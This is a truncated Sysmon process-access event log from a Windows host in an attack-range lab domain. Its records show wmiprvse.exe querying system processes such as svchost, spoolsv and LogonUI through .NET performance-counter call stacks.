10341000x8000000000000000149736Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.542{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1A00-00000000D101}1928C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149735Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.542{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1A00-00000000D101}1928C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149734Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.542{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1900-00000000D101}1808C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149733Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.542{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1900-00000000D101}1808C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149732Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.542{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1800-00000000D101}1548C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149731Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.542{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1800-00000000D101}1548C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149730Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.542{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1700-00000000D101}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149729Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.542{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1700-00000000D101}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149728Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.542{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149727Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.542{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149726Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.542{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149725Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.542{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149724Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.542{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149723Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.541{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149722Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.541{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1300-00000000D101}1008C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149721Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.541{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1300-00000000D101}1008C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149720Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.541{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1200-00000000D101}960C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149719Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.541{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1200-00000000D101}960C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149718Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.541{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1100-00000000D101}968C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149717Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.540{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1100-00000000D101}968C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149716Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.538{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1000-00000000D101}940C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149715Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.536{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1000-00000000D101}940C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149714Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.535{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0F00-00000000D101}928C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149713Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.535{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0F00-00000000D101}928C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149712Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.535{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0E00-00000000D101}880C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Corper